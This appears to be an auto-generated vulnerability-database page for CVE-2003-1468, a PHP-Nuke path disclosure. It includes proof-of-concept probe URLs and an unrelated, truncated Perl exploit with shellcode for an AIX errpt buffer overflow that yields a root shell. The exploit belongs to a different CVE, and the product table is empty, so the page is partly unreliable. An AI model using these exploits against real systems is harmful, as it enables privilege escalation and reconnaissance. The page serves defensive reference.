CVE-2003-1468
published 2003-12-31CVE-2003-1468: The Web_Links module in PHP-Nuke 6.0 through 6.5 final allows remote attackers to obtain the full web server path via an invalid cid parameter that is…
PriorityP411medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
2.27%
80.9th percentile
The Web_Links module in PHP-Nuke 6.0 through 6.5 final allows remote attackers to obtain the full web server path via an invalid cid parameter that is non-numeric or null, which leaks the pathname in an error message.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure
exploitdb·2003-05-13
CVE-2003-1468 PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure
PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure
---
source: https://www.securityfocus.com/bid/7589/info
The Web_Links module for PHP-Nuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker.
An attacker may use the information gathered in this manner to mount further attacks against the host.
It should be noted that although PHP-Nuke version 6.x has been reported vulnerable, other versions might also be affected.
http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
Exploit-DB
IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
exploitdb·2003-04-16
CVE-2002-1468 IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\x
No writeups or analysis indexed.
2003-12-31
Published